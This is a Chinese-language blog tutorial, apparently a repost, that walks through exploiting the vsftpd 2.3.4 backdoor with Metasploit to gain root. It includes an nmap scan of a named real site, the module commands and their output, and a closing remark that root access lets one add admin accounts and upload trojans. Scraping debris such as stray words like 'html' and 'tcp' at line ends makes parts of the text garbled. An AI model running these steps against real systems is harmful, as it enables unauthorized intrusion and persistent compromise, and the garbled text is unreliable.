metasploit利用vsftpd漏洞获取root权限

vsftpd version 2到2.3.4存在后门漏洞,攻击者能够经过该漏洞获取root权限。这 里用backtrack 集成的metasploit作测试,metasploit集成了各类各样的漏洞,咱们能够在上面利用服务器、我的PC和应用程序的漏洞。开始菜单路径 backtrack/Exploitation tools/Network Exploitation tools/Metaspolit Framework/msfconsole, 用metaspolit内置的nmap进行主机扫描html

1 nmap -sT -A www.91ri.org -sT

是指用隐蔽的tcp进行链接,-A是指在探测中对服务进行详细的版本测试。nmap是一款强大的扫描工具,简单的一些用法能够点击:《Nmap在实战中的高级用法》文章查看。服务器

使用nmap结果图(单击可放大):app

结果显示目标主机上运行着ftp服务器,版本为vsftpd2.3.4,这个版本的vsftpd存在漏洞,攻击者能够远程获取目标主机的root权限。tcp

下面利用metasploit实施攻击过程,进入metasploit命令行,search vsftpd,搜索有关vsftpd的相关工具和攻击载荷。查找结果以下:工具

msf > search vsftpdpost

Matching Modules
================测试

Name                                  Disclosure Date          Rank       Description
—-                                  —————          —-       ———–
exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Executionui

利用该漏洞命令:命令行

use exploit/unix/ftp/vsftpd_234_backdoor3d

这样提示符就会提示进入到该路径下,show options查看须要设置的相关项:

msf  exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                   yes       The target address
RPORT    21          yes       The target port

Exploit target:

Id  Name
–  —-
0   Automatic

提示须要设置RHOST(攻击目标的IP)、RPORT(目标端口),因为这里是攻击ftp软件,端口默认为21,咱们设置一下目标的ip,命令: set rhost 192.168.1.101, 在输入show options回车,确认下参数设置正确。检查无误,输入命令help,查看相关的操纵,通常是run或者exploit便可实施攻击.

结果如图(单击放大)

结果显示已经获取了目标主机的root权限,创建管理员帐号、上传木马等动做就能够开始了。剩下的你懂得!

91ri.org:文章很简单 只是普通的exploit使用教程 不过我转这篇文章只想告诉你们metasploit不是只有ms08067!!!!!!! 最近在各个群里看过多了 因此再转篇科普。强烈推荐:《传说中的metasploit渗透防护终极手册?》文章,文末暴力评论值得深思!

原文 :http://happyrxk.cn/?post=11

相关文章
相关标签/搜索